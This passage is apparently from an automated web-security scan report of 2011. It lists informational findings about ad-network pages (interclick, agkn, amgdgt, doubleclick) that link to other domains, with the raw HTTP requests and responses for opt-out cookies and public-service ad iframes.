The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /CookieCheck.aspx?optOut=http%3a%2f%2fwww.networkadvertising.org%2fverify%2fcookie_optout.gif&hasCookies=http%3a%2f%2fwww.networkadvertising.org%2fverify%2fcookie_exists.gif&nocookies=http%3a%2f%2fwww.networkadvertising.org%2fverify%2fno_cookie.gif&nocache=0.8440843 HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Opt=out; T=1

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 175
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 17 Sep 2011 16:43:52 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>.</h2>
</body></html>
18.6. http://a1.interclick.com/optOut.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /optOut.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /optOut.aspx?optOut=verify&success=http%3a%2f%2fwww.networkadvertising.org%2foptout%2fopt_success.gif&fail=http%3a%2f%2fwww.networkadvertising.org%2foptout%2fopt_failure.gif HTTP/1.1
Host: a1.interclick.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: Opt=out

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 173
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://www.networkadvertising.org/optout/opt_failure.gif
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 17 Sep 2011 17:18:48 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/optout/opt_failure.gif">here</a>.</h2>
</body></html>
18.7. http://ad.agkn.com/iframe!t=1089!  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1089!

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe!t=1089!?ct=US&st=TX&ac=214&zp=75207&bw=4&dma=102&city=13290&che=3913294&clk1=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/h%3B245108818%3B0-0%3B0%3B69151653%3B3454-728/90%3B43624044/43641831/1%3B%3B%7Eokv%3D%3Bpc%3DDFP244754359%3B%3B%7Eaopt%3D0/ff/6734/ff%3B%7Efdr%3D244754359%3B0-0%3B0%3B18485482%3B3454-728/90%3B43698008/43715795/1%3B%3B%7Eokv%3D%3Bsite%3Danswerology%3Bcat%3Dhomepage%3Bdemo%3Dadult%3Btile%3D1%3Bsect%3Danswerology%3Bdcopt%3Dist%3Bsz%3D728x90%3B%7Eaopt%3D2/0/6734/0%3B%7Esscs%3D%3f HTTP/1.1
Host: ad.agkn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/index.aspx?template=ads.ascx&topic=homepage&tile=1
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 16:51:31 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:51:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/click;h=v8/3b85/3/0/*/h;245108818;0-0;0;69151653;3454-728/90;43624044/43641831/1;;~okv=;pc=DFP244754359;;~aopt=0/ff/6734/ff;~fdr=244754359;0-0;0;18485482;3454-728/90;43698008/43715795/1;;~okv=;site=answerology;cat=homepage;demo=adult;tile=1;sect=answerology;dcopt=ist;sz=728x90;~aopt=2/0/6734/0;~sscs=?http://ad.agkn.com/interaction!che=686653140?imid=8728562722160963837&ipid=777&caid=696&cgid=293&crid=3377&a=CLICK&adid=586&status=0&l=http://www.pantene.com/en-US/hair-care-collections/restore-beautiful-lengths.aspx" rel="nofollow external" target="_blank">
<img src="http://content.aggregateknowledge.com/ak/flash/Pantene/Jigsaw_RBL/statics/728x90.jpg" BORDER="0" WIDTH="728" HEIGHT="90" ALT="Click Here"/>
</a>
...[SNIP]...
18.8. http://ad.agkn.com/iframe!t=1089!  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1089!

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe!t=1089!?ct=US&st=TX&ac=214&zp=75207&bw=4&dma=102&city=13290&che=3807892&clk1=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/u%3B245108818%3B0-0%3B0%3B69151653%3B3454-728/90%3B43624044/43641831/1%3B%3B%7Eokv%3D%3Bpc%3DDFP244754359%3B%3B%7Eaopt%3D0/ff/34/ff%3B%7Efdr%3D244754359%3B0-0%3B0%3B18485482%3B3454-728/90%3B43698008/43715795/1%3B%3B%7Eokv%3D%3Bsite%3Danswerology%3Bcat%3Dother%3Bdemo%3Dadult%3Btile%3D1%3Bsect%3Danswerology%3Bdcopt%3Dist%3Bsz%3D728x90%3Brsi%3D%3B%7Eaopt%3D2/0/34/0%3B%7Esscs%3D%3f HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/index.aspx?template=ads.ascx&topic=other&tile=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 16:43:19 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:43:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/click;h=v8/3b85/3/0/*/u;245108818;0-0;0;69151653;3454-728/90;43624044/43641831/1;;~okv=;pc=DFP244754359;;~aopt=0/ff/34/ff;~fdr=244754359;0-0;0;18485482;3454-728/90;43698008/43715795/1;;~okv=;site=answerology;cat=other;demo=adult;tile=1;sect=answerology;dcopt=ist;sz=728x90;rsi=;~aopt=2/0/34/0;~sscs=?http://ad.agkn.com/interaction!che=1971445559?imid=1083744942900846784&ipid=777&caid=696&cgid=293&crid=3384&a=CLICK&adid=586&status=0&l=http://www.pantene.com/en-US/hair-care-collections/restore-beautiful-lengths.aspx" rel="nofollow external" target="_blank">
<img src="http://content.aggregateknowledge.com/ak/flash/Pantene/Jigsaw_RBL/statics/728x90.jpg" BORDER="0" WIDTH="728" HEIGHT="90" ALT="Click Here"/>
</a>
...[SNIP]...
18.9. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ads/?t=i&f=j&p=2796&pl=abe61b4b&rnd=77409833483397970 HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO=OptOut

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ID=""; Domain=.amgdgt.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: LO=""; Domain=.amgdgt.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 1942
Date: Sat, 17 Sep 2011 16:38:22 GMT

_378374_amg_acamp_id=196462;
_378374_amg_pcamp_id=90120;
_378374_amg_location_id=72903;
_378374_amg_creative_id=378374;
_378374_amg_loaded=true;
var _amg_378374_content='<iframe width="728" height="90" marginheight="0" marginwidth="0" frameborder="0" scrolling="no" src="http://adsfac.us/ag.asp?cc=ETN002.315724.0&source=iframe&ord=1303810967&clk=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUj7N5eqnCJuAi69iu2Ox7NMwHxLBnZW8sdXNhLHQsMTMxNjI3NzUwMzgzMSxjLDM3ODM3NCxwYyw5MDEyMCxhYywxOTY0NjIsbyxOMC1TMCxsLDcyOTAzCg--/clkurl="></iframe>
...[SNIP]...
</script> \n'+
'<script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'<span id="te-clearads-js-adconion01cont3"><script type="text/javascript" src="http://choices.truste.com/ca?pid=adexpose01&aid=adconion01&cid=0511adc728x90&c=adconion01cont3&w=728&h=90&plc=tr"></script></span><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=90120&c5=196462&c6=&cv=1.3&cj=1&rn=1695890038" style="display:none" width="0" height="0" alt="" /><img src="http://tags.bluekai.com/site/4318" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type=\'text/javascript\' language=\'javascript\' src=\'http://cdn.doubleverify.com/script407.js?agnc=1095913&cmp=1110068&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=67&plc=223
...[SNIP]...
18.10. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1395.132636.7201864412421/B3640803.3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N1395.132636.7201864412421/B3640803.3;sz=300x250;ord=1316279305? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316297380177&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5233
Date: Sat, 17 Sep 2011 17:08:25 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Mon May 04 11:03:28 EDT 2009 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
target="_blank" href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/n%3B214970198%3B0-0%3B0%3B36806893%3B4307-300/250%3B31322948/31340824/1%3B%3B%7Esscs%3D%3fhttp://www.strokeassociation.org"><img src="http://s0.2mdn.net/2276943/adc_stroke_pledge_300x250.gif" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...
18.11. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1395.132636.7201864412421/B3640803.3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N1395.132636.7201864412421/B3640803.3;sz=300x250;ord=1316279633? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316297707985&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5259
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 17 Sep 2011 17:13:53 GMT
Expires: Sat, 17 Sep 2011 17:13:53 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Oct 08 10:18:43 EDT 2009 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<a target="_blank" href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/g%3B214970183%3B1-0%3B0%3B36806893%3B4307-300/250%3B33713581/33731459/1%3B%3B%7Esscs%3D%3fhttp://www.fatherhood.gov"><img src="http://s0.2mdn.net/2276943/adc_fatherhood_tictactoe_300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...
18.12. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1395.132636.7201864412421/B3640803.3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N1395.132636.7201864412421/B3640803.3;sz=300x250;ord=1316279615? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316297690674&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5902
Date: Sat, 17 Sep 2011 17:13:36 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><div class='kj_cx'>
<!-- Copyright 2008 DoubleClick, a division of Google Inc
...[SNIP]...
<!-- Code auto-generated on Tue Sep 28 16:02:57 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
et="_blank" href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/g%3B229960840%3B0-0%3B0%3B36806893%3B4307-300/250%3B38609726/38627483/1%3B%3B%7Esscs%3D%3fhttp://www.foreclosurehelpandhope.org"><img src="http://s0.2mdn.net/2276943/adc_foreclosure_bowlingbud_300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...
18.13. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1395.132636.7201864412421/B3640803.3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N1395.132636.7201864412421/B3640803.3;sz=300x250;ord=1316279289? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316297364315&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5256
Date: Sat, 17 Sep 2011 17:08:10 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri Sep 24 16:32:02 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
get="_blank" href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/w%3B229514883%3B0-0%3B0%3B36806893%3B4307-300/250%3B38566477/38584234/1%3B%3B%7Esscs%3D%3fhttp://childcarsafety.adcouncil.org/"><img src="http://s0.2mdn.net/2276943/adc_CPS_seat_300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...
18.14. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1395.132636.7201864412421/B3640803.3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N1395.132636.7201864412421/B3640803.3;sz=300x250;ord=1316278115? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316296181487&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5313
Date: Sat, 17 Sep 2011 16:48:35 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Tue Dec 22 11:56:34 EST 2009 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
ef="http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/u%3B217143936%3B1-0%3B0%3B36806893%3B4307-300/250%3B34832647/34850502/1%3B%3B%7Esscs%3D%3fhttp://www.autismspeaks.org/whatisit/learnsigns.php"><img src="http://s0.2mdn.net/2276943/adc_autism_toni2_300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...
18.15. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1395.132636.7201864412421/B3640803.3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N1395.132636.7201864412421/B3640803.3;sz=300x250;ord=1316278112? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316296181487&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5227
Date: Sat, 17 Sep 2011 17:26:01 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Mon May 04 15:22:27 EDT 2009 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
target="_blank" href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/h%3B214970163%3B0-0%3B0%3B36806893%3B4307-300/250%3B31328765/31346641/1%3B%3B%7Esscs%3D%3fhttp://www.mentoringbrothers.org"><img src="http://s0.2mdn.net/2276943/1-adc_bbbs_fact_300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...
18.16. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1395.132636.7201864412421/B3640803.3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N1395.132636.7201864412421/B3640803.3;sz=300x250;ord=1316279956? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316298031048&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5241
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 17 Sep 2011 17:19:16 GMT
Expires: Sat, 17 Sep 2011 17:19:16 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Nov 04 10:13:30 EST 2009 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<a target="_blank" href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/n%3B214970159%3B2-0%3B0%3B36806893%3B4307-300/250%3B34092392/34110273/1%3B%3B%7Esscs%3D%3fhttp://www.adoptuskids.org"><img src="http://s0.2mdn.net/2276943/adc_adoption_hook_300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...
18.17. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1395.132636.7201864412421/B3640803.3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N1395.132636.7201864412421/B3640803.3;sz=300x250;ord=1316279306? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316297380177&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5238
Date: Sat, 17 Sep 2011 17:08:26 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Nov 11 09:58:30 EST 2009 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<a target="_blank" href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/t%3B214970206%3B1-0%3B0%3B36806893%3B4307-300/250%3B34199365/34217243/1%3B%3B%7Esscs%3D%3fhttp://www.iava.org"><img src="http://s0.2mdn.net/2276943/adc_vetsupport_makesome_300x250.gif" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...
18.18. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1395.132636.7201864412421/B3640803.3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

